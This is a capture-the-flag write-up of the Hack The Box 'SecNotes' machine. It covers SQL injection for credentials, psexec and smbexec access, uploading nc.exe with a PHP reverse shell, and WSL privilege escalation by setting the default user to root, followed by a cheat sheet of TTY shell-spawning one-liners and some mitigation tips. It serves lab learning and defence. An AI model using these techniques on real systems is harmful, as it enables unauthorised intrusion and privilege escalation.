Skip to content

Windows Subsystem for Linux (WSL) - SecNotes Box

WSL Overview

What is WSL?

WSL (Windows Subsystem for Linux) allows you to run a Linux environment directly on Windows, without needing a full VM or dual boot. It's used by developers, sysadmins, and pentesters.

What's the Issue Described?

The tweet outlines how WSL can be used to start a shell (bind or reverse) with root privileges — even if you don't know the Linux root password — simply by changing the default user to root.

What's Happening in Detail?

  1. wsl whoami
    • This shows the current user inside the WSL environment.
  2. ./ubuntu1604.exe config --default-user root
    • This command sets the default user in WSL (for Ubuntu 16.04) to root.
    • You don't need the root password to do this — Windows controls this setting, not Linux PAM.
  3. wsl whoami
    • Now this returns root because the default user has been changed.
  4. wsl python -c '<reverse shell>'
    • Now that you're root, you can execute a Python one-liner to spawn a bind shell or reverse shell.
    • This gives remote access to the machine or opens up a port for an attacker to connect.

Where are the executables?

  • bash.exe path:
    • C:\Windows\WinSxS\... contains system executables, including an older bash.exe for WSLv1.
  • WSL root filesystem:
    • Found in C:\Users\<username>\AppData\Local\Packages\Canonical...
    • You can browse, edit, or drop files in the Linux filesystem.

What's the Risk?

  • A local attacker or malicious script can:
    • Change the WSL user to root.
    • Launch a reverse shell back to an attacker.
    • Do this without needing elevated Windows permissions.

This means any user on the system can leverage WSL to:

  • Gain root in the WSL environment.
  • Run Linux binaries as root.
  • Potentially pivot to Windows-side attacks (depending on setup and protections).

Mitigation Tips

  1. Restrict WSL access to trusted users only.
  2. Disable WSL if not in use: dism.exe /online /disable-feature /featurename:Microsoft-Windows-Subsystem-Linux
  3. Monitor for:
    • -default-user root usage
    • WSL-based network activity
  4. Use application whitelisting or Defender for Endpoint rules.

To Gain a Foothold (Box 3 - SecNotes)

Port Scan Ports Found

We got port 80 / 445 / 8808

Port 80 Enumeration

Let's Enumerate Port 80/

Port 80 Analysis

We need to signup now !

Signup Page Signup Success

Whenever you see a Login Page Try SQL Injection !! > As a Penetration Tester

Okay now we move on to Burp Suite to test the payload ! > Foxy Proxy

After succesfully completion of SQL Injection we are good to go as we get the UID.

SQLi Success

Followed by : psexec.py tyler: "the pass which we retrieved from the SQL Injection"@

psexec.py Usage

Let's Enumerate Further via using smbclient

smbclient Usage

So, we tried using apsx Metasploit Payload but it didn't worked | We need to think out of the Box.

We can run a malacious PHP

locate nc.exe

Then > cp /use/share/windows-resources/binaries/nc.exe > nc.exe

Let's continue on that path :

smbclient Usage

After the nc.exe is completed we need to upload the .exe file over there.

We need to create an PHP Malicious file

gedit rev.php

PHP Malicious File

We need a listener > nc -nvlp 4444

Listener

It denied the systeminfo as some antivirus is running along side!

Denied Systeminfo

Escalation via WSL

Spawning a TTY Shell - https://netsec.ws/?p=337

Impacket Toolkit - https://github.com/SecureAuthCorp/impacket

WSL Escalation WSL Escalation 2 WSL Escalation 3

Spawning a TTY Shell

There are a number of ways to spawn TTY shells once a machine has been compromised on an engagement, below is a list of methods that have been sourced from various places online and listed here for ease:

Python

python -c 'import pty;pty.spawn("/bin/bash")'

Script

/usr/bin/script -qc /bin/bash /dev/null

Echo

echo os.system('/bin/bash')

SH

/bin/sh -i

Perl

perl —e 'exec "/bin/sh";'

Lua

os.execute('/bin/sh')

Ruby

exec "/bin/sh"

Making the Shell Fully Interactive

To enable autocomplete within the shell use the following:

  1. Background the shell process using CTRL+Z
  2. Enter stty raw -echo
  3. Foreground the process again using fg
  4. Then set the TERM variable to the name of your terminal using export TERM=<terminalNameHere>

Once this has been done, you will be able to use tab autocomplete and scroll through historic terminal commands using the arrow keys.

We should always check the History for either it's Windows or Linux Privilege Escalation.

Shell History

Seems like we got the Username and Password 😁

Credentials Found

But this is not the access for the shell !!!

We need to install : Impacket Toolkit - https://github.com/SecureAuthCorp/impacket

Impacket Install

Seems like ANtivirus is fucking up again !!!

We are now doing this smbexec.py > It will lead to semi shell

smbexec Usage

HTB SecNotes: Vulnerabilities Exploited

1. SQL Injection in Web Login Form (Initial Foothold)

Vulnerability:

The login form does not sanitize user input, allowing attackers to inject raw SQL queries.

Vulnerability Type:

Input Validation Vulnerability → SQL Injection (Authentication Bypass)

Summary:

  • Exploited with Burp Suite to bypass login
  • Extracted valid Windows credentials (e.g., tyler:<password>)
  • Used with psexec.py to gain shell access

Already Discussed:

This was your foothold. SQL injection gave you access to internal user credentials.

2. WSL Misconfiguration (Privilege Escalation)

Vulnerability:

Windows Subsystem for Linux (WSL) allowed changing the default Linux user to root without authentication, leading to root access inside the WSL environment.

Vulnerability Type:

Local Privilege Escalation → Misconfiguration (WSL Default User Set to Root)

Summary:

  • Windows controls the WSL default user, not Linux PAM

  • Ran:

    bash
CopyEdit
.\ubuntu1604.exe config --default-user root

  • Once root in WSL, spawned a reverse shell as root via:

    bash
CopyEdit
wsl python -c '<reverse shell>'

Already Discussed:

This is your escalation path — from low-privilege to root access in WSL.

3. (Optional/Secondary) Insecure Credential Storage

Vulnerability:

Credentials were discovered in shell history or registry/config files, readable by a low-privileged user.

Vulnerability Type:

Post-Exploitation → Insecure Credential Storage

Summary:

  • Recovered creds from .bash_history, registry, or config
  • Enabled further access or lateral movement
  • Possibly used with smbexec.py or reused for privilege escalation

Already Discussed:

This was a supporting path you took when reverse shell options were blocked by AV.